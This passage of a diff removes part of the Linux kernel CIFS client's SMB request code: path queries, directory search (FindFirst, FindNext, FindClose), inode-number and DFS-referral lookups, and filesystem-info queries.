+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in UnixQPathInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
+-			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			memcpy((char *) pFindData,
+-			       (char *) &pSMBr->hdr.Protocol +
+-			       data_offset,
+-			       sizeof(FILE_UNIX_BASIC_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto UnixQPathInfoRetry;
+-
+-	return rc;
+-}
+-
+-/* xid, tcon, searchName and codepage are input parms, rest are returned */
+-int
+-CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const char *searchName, struct cifs_sb_info *cifs_sb,
+-	      __u16 *pnetfid, __u16 search_flags,
+-	      struct cifs_search_info *psrch_inf, bool msearch)
+-{
+-/* level 257 SMB_ */
+-	TRANSACTION2_FFIRST_REQ *pSMB = NULL;
+-	TRANSACTION2_FFIRST_RSP *pSMBr = NULL;
+-	T2_FFIRST_RSP_PARMS *parms;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int name_len, remap;
+-	__u16 params, byte_count;
+-	struct nls_table *nls_codepage;
+-
+-	cifs_dbg(FYI, "In FindFirst for %s\n", searchName);
+-
+-findFirstRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	nls_codepage = cifs_sb->local_nls;
+-	remap = cifs_remap(cifs_sb);
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
+-				       PATH_MAX, nls_codepage, remap);
+-		/* We can not add the asterik earlier in case
+-		it got remapped to 0xF03A as if it were part of the
+-		directory name instead of a wildcard */
+-		name_len *= 2;
+-		if (msearch) {
+-			pSMB->FileName[name_len] = CIFS_DIR_SEP(cifs_sb);
+-			pSMB->FileName[name_len+1] = 0;
+-			pSMB->FileName[name_len+2] = '*';
+-			pSMB->FileName[name_len+3] = 0;
+-			name_len += 4; /* now the trailing null */
+-			/* null terminate just in case */
+-			pSMB->FileName[name_len] = 0;
+-			pSMB->FileName[name_len+1] = 0;
+-			name_len += 2;
+-		}
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-		if (msearch) {
+-			if (WARN_ON_ONCE(name_len > PATH_MAX-2))
+-				name_len = PATH_MAX-2;
+-			/* overwrite nul byte */
+-			pSMB->FileName[name_len-1] = CIFS_DIR_SEP(cifs_sb);
+-			pSMB->FileName[name_len] = '*';
+-			pSMB->FileName[name_len+1] = 0;
+-			name_len += 2;
+-		}
+-	}
+-
+-	params = 12 + name_len /* includes null */ ;
+-	pSMB->TotalDataCount = 0;	/* no EAs */
+-	pSMB->MaxParameterCount = cpu_to_le16(10);
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(
+-	      offsetof(struct smb_com_transaction2_ffirst_req, SearchAttributes)
+-		- 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;	/* one byte, no need to make endian neutral */
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_FIRST);
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
+-			ATTR_DIRECTORY);
+-	pSMB->SearchCount = cpu_to_le16(CIFSMaxBufSize/sizeof(FILE_UNIX_INFO));
+-	pSMB->SearchFlags = cpu_to_le16(search_flags);
+-	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
+-
+-	/* BB what should we set StorageType to? Does it matter? BB */
+-	pSMB->SearchStorageType = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_ffirst);
+-
+-	if (rc) {/* BB add logic to retry regular search if Unix search
+-			rejected unexpectedly by server */
+-		/* BB Add code to handle unsupported level rc */
+-		cifs_dbg(FYI, "Error in FindFirst = %d\n", rc);
+-
+-		cifs_buf_release(pSMB);
+-
+-		/* BB eventually could optimize out free and realloc of buf */
+-		/*    for this case */
+-		if (rc == -EAGAIN)
+-			goto findFirstRetry;
+-	} else { /* decode response */
+-		/* BB remember to free buffer if error BB */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		if (rc == 0) {
+-			unsigned int lnoff;
+-
+-			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-				psrch_inf->unicode = true;
+-			else
+-				psrch_inf->unicode = false;
+-
+-			psrch_inf->ntwrk_buf_start = (char *)pSMBr;
+-			psrch_inf->smallBuf = false;
+-			psrch_inf->srch_entries_start =
+-				(char *) &pSMBr->hdr.Protocol +
+-					le16_to_cpu(pSMBr->t2.DataOffset);
+-			parms = (T2_FFIRST_RSP_PARMS *)((char *) &pSMBr->hdr.Protocol +
+-			       le16_to_cpu(pSMBr->t2.ParameterOffset));
+-
+-			if (parms->EndofSearch)
+-				psrch_inf->endOfSearch = true;
+-			else
+-				psrch_inf->endOfSearch = false;
+-
+-			psrch_inf->entries_in_buffer =
+-					le16_to_cpu(parms->SearchCount);
+-			psrch_inf->index_of_last_entry = 2 /* skip . and .. */ +
+-				psrch_inf->entries_in_buffer;
+-			lnoff = le16_to_cpu(parms->LastNameOffset);
+-			if (CIFSMaxBufSize < lnoff) {
+-				cifs_dbg(VFS, "ignoring corrupt resume name\n");
+-				psrch_inf->last_entry = NULL;
+-				return rc;
+-			}
+-
+-			psrch_inf->last_entry = psrch_inf->srch_entries_start +
+-							lnoff;
+-
+-			if (pnetfid)
+-				*pnetfid = parms->SearchHandle;
+-		} else {
+-			cifs_buf_release(pSMB);
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
+-		 __u16 searchHandle, __u16 search_flags,
+-		 struct cifs_search_info *psrch_inf)
+-{
+-	TRANSACTION2_FNEXT_REQ *pSMB = NULL;
+-	TRANSACTION2_FNEXT_RSP *pSMBr = NULL;
+-	T2_FNEXT_RSP_PARMS *parms;
+-	char *response_data;
+-	int rc = 0;
+-	int bytes_returned;
+-	unsigned int name_len;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In FindNext\n");
+-
+-	if (psrch_inf->endOfSearch)
+-		return -ENOENT;
+-
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 14; /* includes 2 bytes of null string, converted to LE below*/
+-	byte_count = 0;
+-	pSMB->TotalDataCount = 0;       /* no EAs */
+-	pSMB->MaxParameterCount = cpu_to_le16(8);
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset =  cpu_to_le16(
+-	      offsetof(struct smb_com_transaction2_fnext_req,SearchHandle) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_NEXT);
+-	pSMB->SearchHandle = searchHandle;      /* always kept as le */
+-	pSMB->SearchCount =
+-		cpu_to_le16(CIFSMaxBufSize / sizeof(FILE_UNIX_INFO));
+-	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
+-	pSMB->ResumeKey = psrch_inf->resume_key;
+-	pSMB->SearchFlags = cpu_to_le16(search_flags);
+-
+-	name_len = psrch_inf->resume_name_len;
+-	params += name_len;
+-	if (name_len < PATH_MAX) {
+-		memcpy(pSMB->ResumeFileName, psrch_inf->presume_name, name_len);
+-		byte_count += name_len;
+-		/* 14 byte parm len above enough for 2 byte null terminator */
+-		pSMB->ResumeFileName[name_len] = 0;
+-		pSMB->ResumeFileName[name_len+1] = 0;
+-	} else {
+-		rc = -EINVAL;
+-		goto FNext2_err_exit;
+-	}
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_fnext);
+-	if (rc) {
+-		if (rc == -EBADF) {
+-			psrch_inf->endOfSearch = true;
+-			cifs_buf_release(pSMB);
+-			rc = 0; /* search probably was closed at end of search*/
+-		} else
+-			cifs_dbg(FYI, "FindNext returned = %d\n", rc);
+-	} else {                /* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc == 0) {
+-			unsigned int lnoff;
+-
+-			/* BB fixme add lock for file (srch_info) struct here */
+-			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-				psrch_inf->unicode = true;
+-			else
+-				psrch_inf->unicode = false;
+-			response_data = (char *) &pSMBr->hdr.Protocol +
+-			       le16_to_cpu(pSMBr->t2.ParameterOffset);
+-			parms = (T2_FNEXT_RSP_PARMS *)response_data;
+-			response_data = (char *)&pSMBr->hdr.Protocol +
+-				le16_to_cpu(pSMBr->t2.DataOffset);
+-			if (psrch_inf->smallBuf)
+-				cifs_small_buf_release(
+-					psrch_inf->ntwrk_buf_start);
+-			else
+-				cifs_buf_release(psrch_inf->ntwrk_buf_start);
+-			psrch_inf->srch_entries_start = response_data;
+-			psrch_inf->ntwrk_buf_start = (char *)pSMB;
+-			psrch_inf->smallBuf = false;
+-			if (parms->EndofSearch)
+-				psrch_inf->endOfSearch = true;
+-			else
+-				psrch_inf->endOfSearch = false;
+-			psrch_inf->entries_in_buffer =
+-						le16_to_cpu(parms->SearchCount);
+-			psrch_inf->index_of_last_entry +=
+-				psrch_inf->entries_in_buffer;
+-			lnoff = le16_to_cpu(parms->LastNameOffset);
+-			if (CIFSMaxBufSize < lnoff) {
+-				cifs_dbg(VFS, "ignoring corrupt resume name\n");
+-				psrch_inf->last_entry = NULL;
+-				return rc;
+-			} else
+-				psrch_inf->last_entry =
+-					psrch_inf->srch_entries_start + lnoff;
+-
+-/*  cifs_dbg(FYI, "fnxt2 entries in buf %d index_of_last %d\n",
+-    psrch_inf->entries_in_buffer, psrch_inf->index_of_last_entry); */
+-
+-			/* BB fixme add unlock here */
+-		}
+-
+-	}
+-
+-	/* BB On error, should we leave previous search buf (and count and
+-	last entry fields) intact or free the previous one? */
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-	since file handle passed in no longer valid */
+-FNext2_err_exit:
+-	if (rc != 0)
+-		cifs_buf_release(pSMB);
+-	return rc;
+-}
+-
+-int
+-CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const __u16 searchHandle)
+-{
+-	int rc = 0;
+-	FINDCLOSE_REQ *pSMB = NULL;
+-
+-	cifs_dbg(FYI, "In CIFSSMBFindClose\n");
+-	rc = small_smb_init(SMB_COM_FIND_CLOSE2, 1, tcon, (void **)&pSMB);
+-
+-	/* no sense returning error if session restarted
+-		as file handle has been closed */
+-	if (rc == -EAGAIN)
+-		return 0;
+-	if (rc)
+-		return rc;
+-
+-	pSMB->FileID = searchHandle;
+-	pSMB->ByteCount = 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(VFS, "Send error in FindClose = %d\n", rc);
+-
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_fclose);
+-
+-	/* Since session is dead, search handle closed on server already */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const char *search_name, __u64 *inode_number,
+-		      const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc = 0;
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int name_len, bytes_returned;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In GetSrvInodeNum for %s\n", search_name);
+-	if (tcon == NULL)
+-		return -ENODEV;
+-
+-GetInodeNumberRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   search_name, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, search_name);
+-	}
+-
+-	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_INTERNAL_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "error %d in QueryInternalInfo\n", rc);
+-	} else {
+-		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			/* If rc should we check for EOPNOSUPP and
+-			disable the srvino flag? or in caller? */
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-			struct file_internal_info *pfinfo;
+-			/* BB Do we need a cast or hash here ? */
+-			if (count < 8) {
+-				cifs_dbg(FYI, "Invalid size ret in QryIntrnlInf\n");
+-				rc = -EIO;
+-				goto GetInodeNumOut;
+-			}
+-			pfinfo = (struct file_internal_info *)
+-				(data_offset + (char *) &pSMBr->hdr.Protocol);
+-			*inode_number = le64_to_cpu(pfinfo->UniqueId);
+-		}
+-	}
+-GetInodeNumOut:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto GetInodeNumberRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+-		const char *search_name, struct dfs_info3_param **target_nodes,
+-		unsigned int *num_of_nodes,
+-		const struct nls_table *nls_codepage, int remap)
+-{
+-/* TRANS2_GET_DFS_REFERRAL */
+-	TRANSACTION2_GET_DFS_REFER_REQ *pSMB = NULL;
+-	TRANSACTION2_GET_DFS_REFER_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-	*num_of_nodes = 0;
+-	*target_nodes = NULL;
+-
+-	cifs_dbg(FYI, "In GetDFSRefer the path %s\n", search_name);
+-	if (ses == NULL || ses->tcon_ipc == NULL)
+-		return -ENODEV;
+-
+-getDFSRetry:
+-	/*
+-	 * Use smb_init_no_reconnect() instead of smb_init() as
+-	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
+-	 * causing an infinite recursion.
+-	 */
+-	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
+-				   (void **)&pSMB, (void **)&pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	/* server pointer checked in called function,
+-	but should never be null here anyway */
+-	pSMB->hdr.Mid = get_next_mid(ses->server);
+-	pSMB->hdr.Tid = ses->tcon_ipc->tid;
+-	pSMB->hdr.Uid = ses->Suid;
+-	if (ses->capabilities & CAP_STATUS32)
+-		pSMB->hdr.Flags2 |= SMBFLG2_ERR_STATUS;
+-	if (ses->capabilities & CAP_DFS)
+-		pSMB->hdr.Flags2 |= SMBFLG2_DFS;
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		pSMB->hdr.Flags2 |= SMBFLG2_UNICODE;
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->RequestFileName,
+-				       search_name, PATH_MAX, nls_codepage,
+-				       remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {	/* BB improve the check for buffer overruns BB */
+-		name_len = copy_path_name(pSMB->RequestFileName, search_name);
+-	}
+-
+-	if (ses->server->sign)
+-		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	pSMB->hdr.Uid = ses->Suid;
+-
+-	params = 2 /* level */  + name_len /*includes null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->MaxParameterCount = 0;
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	  struct smb_com_transaction2_get_dfs_refer_req, MaxReferralLevel) - 4);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_GET_DFS_REFERRAL);
+-	byte_count = params + 3 /* pad */ ;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->MaxReferralLevel = cpu_to_le16(3);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in GetDFSRefer = %d\n", rc);
+-		goto GetDFSRefExit;
+-	}
+-	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-	/* BB Also check if enough total bytes returned? */
+-	if (rc || get_bcc(&pSMBr->hdr) < 17) {
+-		rc = -EIO;      /* bad smb */
+-		goto GetDFSRefExit;
+-	}
+-
+-	cifs_dbg(FYI, "Decoding GetDFSRefer response BCC: %d  Offset %d\n",
+-		 get_bcc(&pSMBr->hdr), le16_to_cpu(pSMBr->t2.DataOffset));
+-
+-	/* parse returned result into more usable form */
+-	rc = parse_dfs_referrals(&pSMBr->dfs_data,
+-				 le16_to_cpu(pSMBr->t2.DataCount),
+-				 num_of_nodes, target_nodes, nls_codepage,
+-				 remap, search_name,
+-				 (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE) != 0);
+-
+-GetDFSRefExit:
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto getDFSRetry;
+-
+-	return rc;
+-}
+-
+-/* Query File System Info such as free space to old servers such as Win 9x */
+-int
+-SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct kstatfs *FSData)
+-{
+-/* level 0x01 SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_ALLOC_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "OldQFSInfo\n");
+-oldQFSInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;     /* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_ALLOCATION);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSInfo = %d\n", rc);
+-	} else {                /* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 18)
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			cifs_dbg(FYI, "qfsinf resp BCC: %d  Offset %d\n",
+-				 get_bcc(&pSMBr->hdr), data_offset);
+-
+-			response_data = (FILE_SYSTEM_ALLOC_INFO *)
+-				(((char *) &pSMBr->hdr.Protocol) + data_offset);
+-			FSData->f_bsize =
+-				le16_to_cpu(response_data->BytesPerSector) *
+-				le32_to_cpu(response_data->
+-					SectorsPerAllocationUnit);
+-			/*
+-			 * much prefer larger but if server doesn't report
+-			 * a valid size than 4K is a reasonable minimum
+-			 */
+-			if (FSData->f_bsize < 512)
+-				FSData->f_bsize = 4096;
+-
+-			FSData->f_blocks =
+-			       le32_to_cpu(response_data->TotalAllocationUnits);
+-			FSData->f_bfree = FSData->f_bavail =
+-				le32_to_cpu(response_data->FreeAllocationUnits);
+-			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
+-				 (unsigned long long)FSData->f_blocks,
+-				 (unsigned long long)FSData->f_bfree,
+-				 FSData->f_bsize);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto oldQFSInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct kstatfs *FSData)
+-{
+-/* level 0x103 SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSInfo\n");
+-QFSInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_SIZE_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 24)
+-			rc = -EIO;	/* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-
+-			response_data =
+-			    (FILE_SYSTEM_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			FSData->f_bsize =
+-			    le32_to_cpu(response_data->BytesPerSector) *
+-			    le32_to_cpu(response_data->
+-					SectorsPerAllocationUnit);
+-			/*
+-			 * much prefer larger but if server doesn't report
+-			 * a valid size than 4K is a reasonable minimum
+-			 */
+-			if (FSData->f_bsize < 512)
+-				FSData->f_bsize = 4096;
+-
+-			FSData->f_blocks =
+-			    le64_to_cpu(response_data->TotalAllocationUnits);
+-			FSData->f_bfree = FSData->f_bavail =
+-			    le64_to_cpu(response_data->FreeAllocationUnits);
+-			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
+-				 (unsigned long long)FSData->f_blocks,
+-				 (unsigned long long)FSData->f_bfree,
+-				 FSData->f_bsize);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFSAttributeInfo(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-/* level 0x105  SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_ATTRIBUTE_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSAttributeInfo\n");
+-QFSAttributeRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
